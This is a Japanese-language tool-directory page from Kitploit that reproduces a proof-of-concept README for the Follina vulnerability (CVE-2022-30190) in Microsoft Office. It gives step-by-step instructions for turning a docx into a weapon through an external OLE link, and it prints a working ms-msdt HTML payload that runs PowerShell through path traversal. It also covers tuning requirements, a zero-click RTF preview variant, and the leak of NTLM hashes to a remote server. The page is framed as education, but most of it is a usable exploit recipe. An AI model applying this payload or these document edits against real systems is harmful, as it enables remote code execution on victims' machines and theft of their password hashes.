Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2022-30190 — CVE-2022-30190 (Follina) の概念実証エクスプロイト。ms-msdt URI ハンドラを使用した細工済み Microsoft Office ドキュメントを介したリモートコード実行を実証します。 | Kitploit
ツール/GitHubGitHub/wysiiwyg/poc-cve-2022-30190
脆弱性分析エクスプロイト学習と教育ペイロード開発
GitHubwysiiwyg/poc-cve-2022-30190

PoC-CVE-2022-30190

CVE-2022-30190 (Follina) の概念実証エクスプロイト。ms-msdt URI ハンドラを使用した細工済み Microsoft Office ドキュメントを介したリモートコード実行を実証します。

リポジトリを見る
12224年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

POC CVE-2022-30190 : CVE 0-day MS Office RCE、別名 msdt follina

情報 : Microsoft Officeのゼロデイ脆弱性、PowerShellを実行する攻撃に使用される

概要

2022年5月29日、独立したサイバーセキュリティ研究チームであるNao_Secチームは、Virustotalで共有されていた悪意のあるOffice文書を発見しました。この文書は、被害者に感染させるために、異常ではあるが既知のスキームを使用しています。このスキームは、Microsoft Defender for Endpointなどの一部のEDRでは悪意のあるものとして検出されませんでした。この脆弱性は、マクロを必要としないため、ユーザーの操作なしにコード実行を引き起こす可能性があります。ただし、Protected Viewモードが有効な場合を除きます。まだCVE番号は割り当てられていません。

技術的詳細

この脆弱性は、MSProtocol URIスキームを使用してコードを読み込むことによって悪用されます。攻撃者は、Microsoft Office文書、テンプレート、または電子メール内に、ms-msdt: で始まる悪意のあるリンクを埋め込む可能性があります。これらのリンクは、後でユーザーの操作なしに読み込まれて実行されます。ただし、Protected Viewモードが有効な場合を除きます。それでも、文書をRTF形式に変換すると、Protected View機能をバイパスすることもできます。

概念実証

MS Officeのdocxファイルには、外部OLEオブジェクト参照がHTMLファイルとして含まれる場合があります。HTMLスキーム "ms-msdt:" があり、これはmsdt診断ツールを呼び出し、任意のコード(パラメータで指定)を実行できます。

その結果、悪意のあるdocxファイルを開くだけで(マクロを使わずに)RCEを得られるという恐ろしい攻撃ベクトルが生まれます。

概念実証のdocxを構築する手順は次のとおりです:

  1. Word(最新の2019 Pro、16.0.10386.20017を使用)を開き、ダミー文書を作成して、(OLE)オブジェクト(Bitmap Imageとして)を挿入し、docxとして保存します。

  2. docx構造(プレーンなzip)内の word/_rels/document.xml.rels を編集します。属性を持つXMLタグ <Relationship> を変更します。

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

そして、Target="embeddings/oleObject1.bin" について、Target の値を変更し、属性 TargetMode を追加します:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Idの値に注意してください(おそらく "rId5" です)。

  1. word/document.xml を編集します。<o:OLEObject ..> タグ(r:id="rId5" 付き)を検索し、属性を Type="Embed" から Type="Link" に変更し、属性 UpdateMode="OnCall" を追加します。

注:作成された悪意のあるdocxは、CVE-2021-44444 のものとほぼ同じです。

  1. ms-msdtスキームを使用したPoC(calc.exeランチャー)HTMLペイロードを http://<payload_server>/payload.html で配信します:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

次の点に注意してください:

  • AAAを含むコメント行は60回以上繰り返す必要があります(最低4096バイト)。
  • 最低でも、IT_BrowseForFileパラメータの先頭に2つの /../ ディレクトリトラバーサルが必要でした。
  • $() 内にラップされたコードはPowerShell経由で実行されますが、スペースがあると壊れます。
  • “.exe” は、IT_BrowseForFileパラメータの末尾に存在する最後の文字列でなければなりません。

さらに、トリガーペイロードはリモートの場所に接続できます。信頼されていないバイナリを呼び出す可能性は低いですが、接続にはNTLMハッシュが依然として含まれます(これは、悪意のある行為者が被害者のWindowsパスワードのハッシュを入手できることを意味します)。これは、攻撃者がさらなる侵害後の活動に使用する可能性があります。

ボーナス (0クリックRTF版)

手順3で word/document.xml の <o:OLEObject> 要素の下に次の要素も追加すると、

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

RTFとしても機能します(結果のdocxを開いてRTFとして保存します)。

RTFの場合、Wordでファイルを開く必要はなく、ファイルを参照してプレビューウィンドウで表示するだけで十分です。プレビューウィンドウが外部HTMLペイロードをトリガーし、クリックなしでRCEが発生します。

ソース :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (元のコード)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (追加情報)
ツールをダウンロード